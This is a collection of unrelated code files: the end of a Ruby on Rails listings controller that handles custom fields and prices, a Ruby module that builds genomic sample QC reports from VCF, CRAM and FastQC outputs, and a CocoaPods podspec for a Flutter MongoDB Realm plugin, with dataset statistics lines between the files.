answer_value["(2i)"].to_i, answer_value["(3i)"].to_i) answer else throw "Unimplemented custom field answer for question #{question_type}" end end answer.question = question answer.save logger.info "Errors: #{answer.errors.full_messages.inspect}" return answer end def create_field_values(custom_field_params) custom_field_params ||= {} mapped_values = custom_field_params.map do |custom_field_id, answer_value| custom_field_value_factory(custom_field_id, answer_value) unless is_answer_value_blank(answer_value) end.compact logger.info "Mapped values: #{mapped_values.inspect}" return mapped_values end def is_answer_value_blank(value) if value.kind_of?(Hash) value["(3i)"].blank? || value["(2i)"].blank? || value["(1i)"].blank? # DateFieldValue check else value.blank? end end def is_authorized_to_post if @current_community.require_verification_to_post_listings? unless @current_user.has_admin_rights_in?(@current_community) || @current_community_membership.can_post_listings? redirect_to verification_required_listings_path end end end def numeric_field_ids(custom_fields) custom_fields.map do |custom_field| custom_field.with(:numeric) do custom_field.id end end.compact end def normalize_price_param(listing_params) if listing_params[:price] then listing_params.except(:price).merge(price_cents: MoneyUtil.parse_str_to_cents(listing_params[:price])) else listing_params end end end
37.025057
236
0.715578
26baa1f3c3bc1d3c9293e566af6f9141a4bc11a4
4,979
# frozen_string_literal: true require 'fileutils' require 'pathname' require_relative 'settings' require_relative 'sample/vcf_collection' require_relative 'sample/cram' require_relative 'sample/fastqc_report' require_relative 'report/render' module JgaAnalysisQC class Sample TEMPLATE_PREFIX = 'report' FASTQC_DIRNAME = 'fastqc' # @return [String] sample name attr_reader :name # @return [dir] attr_reader :dir # @return [VcfCollection] attr_reader :vcf_collection # @return [Cram, nil] attr_reader :cram # @return [Array<FastqcReport>] attr_reader :fastqc_reports # @param name [String] # @param dir [Pathname] # @param vcf_collection [VcfCollection] # @param cram [Cram, nil] # @param fastqc_reports [Array<FastqcReport>] def initialize(name, dir, vcf_collection, cram = nil, fastqc_reports: []) @name = name @dir = dir @vcf_collection = vcf_collection @cram = cram @fastqc_reports = fastqc_reports end # @param show_path [Boolean] # @param fastqc [Boolean] def render(show_path: true, fastqc: false) Report::Render.run( TEMPLATE_PREFIX, @dir, binding, toc_nesting_level: Report::SAMPLE_TOC_NESTING_LEVEL ) end class << self # @param result_dir [Pathname] # @param sample_name [String] # @param fastqc [Boolean] # @return [Sample] def parse(result_dir, sample_name, fastqc: false) sample_dir = result_dir / sample_name vcf_collection = read_vcf_collection(sample_dir, sample_name) cram = read_cram(sample_dir, sample_name) fastqc_reports = fastqc ? read_fastqc(result_dir, sample_dir, sample_name) : [] Sample.new(sample_name, sample_dir, vcf_collection, cram, fastqc_reports: fastqc_reports) end private # @param sample_dir [Pathname] # @param sample_name [String] # @return [VcfCollection] def read_vcf_collection(sample_dir, sample_name) vcfs = HAPLOTYPECALLER_REGIONS.filter_map do |chr_region| vcf_basename = "#{sample_name}.#{chr_region.id}.g.vcf.gz" vcf_path = sample_dir / vcf_basename next unless vcf_path.exist? bcftools_stats_path = sample_dir / "#{vcf_basename}.bcftools-stats" bcftools_stats = Vcf::BcftoolsStats.parse(chr_region, bcftools_stats_path) Vcf.new(vcf_path, chr_region, bcftools_stats) end VcfCollection.new(vcfs) end # @param sample_dir [Pathname] # @param sample_name [String] # @return [Cram, nil] def read_cram(sample_dir, sample_name) cram_basename = "#{sample_name}.cram" cram_path = sample_dir / cram_basename return nil unless cram_path.exist? Cram.new( cram_path, Cram::SamtoolsIdxstats.parse(sample_dir / "#{cram_basename}.idxstats"), Cram::SamtoolsFlagstat.parse(sample_dir / "#{cram_basename}.flagstat"), read_picard_collect_wgs_metrics_collection(sample_dir, cram_basename), read_picard_collect_base_distribution_per_cycle(sample_dir, cram_basename) ) end # @param result_dir [Pathname] # @param sample_dir [Pathname] # @param sample_name [String] # @return [Array<FastqcReport>] def read_fastqc(result_dir, sample_dir, sample_name) Dir[sample_dir / 'fastqc' / '*'].filter_map do |dir| dir = Pathname.new(dir) next unless dir.directory? read_id = dir.basename.to_s html_path = dir / "#{read_id}_fastqc.html" next unless html_path.exist? FastqcReport.new(read_id, html_path.relative_path_from(result_dir)) end end # @param sample_dir [Pathname] # @param cram_basename [String] # @return [Cram::PicardCollectWgsMetricsCollection] def read_picard_collect_wgs_metrics_collection(sample_dir, cram_basename) picard_collect_wgs_metrics = WGS_METRICS_REGIONS.filter_map do |chr_region| picard_collect_wgs_metrics_path = sample_dir / "#{cram_basename}.#{chr_region.id}.wgs_metrics" Cram::PicardCollectWgsMetrics.parse(picard_collect_wgs_metrics_path, chr_region) end Cram::PicardCollectWgsMetricsCollection.new(picard_collect_wgs_metrics) end # @param sample_dir [Pathname] # @param cram_basename [String] # @return [Cram::PicardCollectBaseDistributionByCycle, nil] def read_picard_collect_base_distribution_per_cycle(sample_dir, cram_basename) chart_png_path = sample_dir / "#{cram_basename}.collect_base_dist_by_cycle.chart.png" return nil unless chart_png_path.exist? Cram::PicardCollectBaseDistributionByCycle.new(chart_png_path) end end end end
34.10274
97
0.658365
1166a8cfa535d51ef671dadfc75468dbc53f38e4
986
# # To learn more about a Podspec see http://guides.cocoapods.org/syntax/podspec.html. # Run `pod lib lint flutter_mongo_stitch.podspec' to validate before publishing. # Pod::Spec.new do |s| s.name = 'flutter_mongodb_realm' s.version = '0.0.1' s.summary = 'A new Flutter plugin.' s.description = <<-DESC A new Flutter plugin. DESC s.homepage = 'http://example.com' s.license = { :file => '../LICENSE' } s.author = { 'Your Company' => '[email protected]' } s.source = { :path => '.' } s.source_files = 'Classes/**/*' s.dependency 'Flutter' s.platform = :ios, '11.0' # Flutter.framework does not contain a i386 slice. Only x86_64 simulators are supported. s.pod_target_xcconfig = { 'DEFINES_MODULE' => 'YES', 'VALID_ARCHS[sdk=iphonesimulator*]' => 'x86_64' } s.swift_version = '5.0' s.dependency 'StitchSDK', '= 6.4.0' s.dependency 'RealmSwift', '=10.1.4' end
37.923077
104
0.602434